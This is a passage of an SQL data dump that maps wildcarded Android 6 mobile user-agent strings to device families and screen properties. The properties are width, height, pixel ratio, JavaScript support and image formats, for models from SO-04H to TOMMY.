6.*; SO-04H) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; SOV31) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; SOV32) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; SOV34) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; SP-5200) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; SP6.2) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; STARADDICT 6) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; STARNAUTE 3) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; STARNAUTE3) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; STARTRAIL 8) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; STARXTREM 6) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; STH100-1) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":731,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; STH100-2) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":731,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; STK_Sync_5e) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; STUDIO M LTE) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; STV100-1) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":731,\"pixelRatio\":3.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; STV100-2) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":731,\"pixelRatio\":3.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; STV100-3) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":731,\"pixelRatio\":3.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; STV100-4) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":731,\"pixelRatio\":3.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; SUGAR F7 mini) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; SUNNY MAX) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; SUNNY) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; SUNNY2) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; SW001SH) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; SWITCH) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; Seoul 5) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; Shine) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; Shoot_1) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; Silver Q) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; Smart5) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; Smart5.5Plus32GB) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; Smart5Plus32GB) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; SmartVision2) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; Smartphone6.1) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; Soneview SP-3000) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; Spark) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; Speed-X2) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; Speed-Y3) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; Storm) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; Studio C HD) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; Studio G HD LTE) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; Studio G2 HD) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; Studio J1) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; Studio J2) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; Studio J5) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; Studio XL 2) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; Sun_S5501) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; Swift 2 Plus) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; Swift 2) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; Symbol S3) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; T04) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; T06) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; T07) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; T08) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; T09) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; T1) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; T10) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; T11) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; T3) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; T5) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; T51117) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; T5_Lite) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; T6pro) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; TECNO CF7) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_tecno','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":750,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; TECNO K7) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_tecno','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; TECNO L8 Lite) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_tecno','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; TECNO S1) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_tecno','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; TECNO W2) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_tecno','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; TECNO W4) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_tecno','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; TECNO W5 Lite) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_tecno','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; TECNO-C7) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_tecno','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; TECNO-C9) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_tecno','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; TECNO-N2S) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_tecno','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; TECNO-N8) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_tecno','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; TECNO-N8S) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_tecno','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; TECNO-N9) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_tecno','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; TECNO-N9S) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_tecno','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; TECNO-W3) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_tecno','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; TECNO-W3LTE) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_tecno','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; TECNO-W5) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_tecno','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; TECNO_W2) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_tecno','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; TECNO_W4) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_tecno','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; TG-L800S) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; TG45) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; TIS001) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; TOMMY) 